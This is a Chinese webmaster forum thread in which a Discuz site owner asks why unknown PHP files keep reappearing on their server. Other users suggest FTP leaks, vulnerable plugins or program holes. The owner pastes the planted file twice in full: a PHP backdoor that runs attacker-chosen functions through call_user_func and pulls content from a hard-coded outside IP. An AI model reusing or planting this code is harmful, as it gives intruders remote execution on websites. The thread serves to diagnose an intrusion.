网站被添加不明文件,求大神指教
http://att.discuz.net/data/attachment/forum/201701/17/164119enqn2uouo2ywuki2.png诸如此类的文件,改了服务密码、用户名还有端口,也更新的系统都还是每天被添加。
求大神指教,谢谢! 被黑了还是某个软件生成?
看看文件内容是什么啊。 对方能写入文件,要么是ftp泄露了,关闭ftp还能写入的话,那就是程序漏洞,这事情,得具体看,看你截图能诊断出来,那就不是神了,是上帝。 hhb121 发表于 2017-1-17 16:48
对方能写入文件,要么是ftp泄露了,关闭ftp还能写入的话,那就是程序漏洞,这事情,得具体看,看你截图能诊 ...
没有装FTP软件,如果是程序漏洞怎么办?已经是最新版本了 打开看看内容 非默认可以备份后 删除 把php贴出来,看看是什么鬼东西 mingkong 发表于 2017-1-17 16:47
被黑了还是某个软件生成?
看看文件内容是什么啊。
绝不是软件 DZ第一帅哥 发表于 2017-1-17 17:01
删除后又会被添加啊,这个才是麻烦
那可能中毒了 楼主我看你一点都不着急,连被加载出来php也不愿意贴出来,别人知道是怎么回事。另外,不是服务器问题,不是程序问题,那就是插件问题了,把所有插件都关闭,然后删除那些文件,看看还能不能生成。如果在之前你覆盖过文件,如果数据库泄露了,对方也没办法知道你后台管理账户和密码,除非你默认账密admin,所以说不是数据库爆库的问题,那就是你程序漏洞被植入了可执行文件,导致对方能自动写入,贴出来,大家看看写入的是什么。再来判断。 着重看下服务器安全和插件这块 hhb121 发表于 2017-1-17 17:48
楼主我看你一点都不着急,连被加载出来php也不愿意贴出来,别人知道是怎么回事。另外,不是服务器问题,不 ...类似于这样的
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://103.42.29.48/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
if(key($_GET)=='SERVER')call_user_func($_GET['SERVER'],$_POST['host_name']);
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
}
return $html;
}
?> 我心枫叶 发表于 2017-1-17 21:46
着重看下服务器安全和插件这块
类似于这样的文件
代码如下,请问怎么搞
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://103.42.29.48/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
if(key($_GET)=='SERVER')call_user_func($_GET['SERVER'],$_POST['host_name']);
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
}
return $html;
}
?> 程序出现漏洞了,当用户浏览页面的时候,返回代码,类似于小偷程序,不知道你网站有什么有价值的东西。 应该是在抓取用户数据。能自己搞就自己搞,上传全新程序,按照升级方式全新覆盖,看看情况,如果自己搞不了,付费支持也可以,Q 861827250至于原因,这个不好说,没具体看,说不清楚。
页:
[1]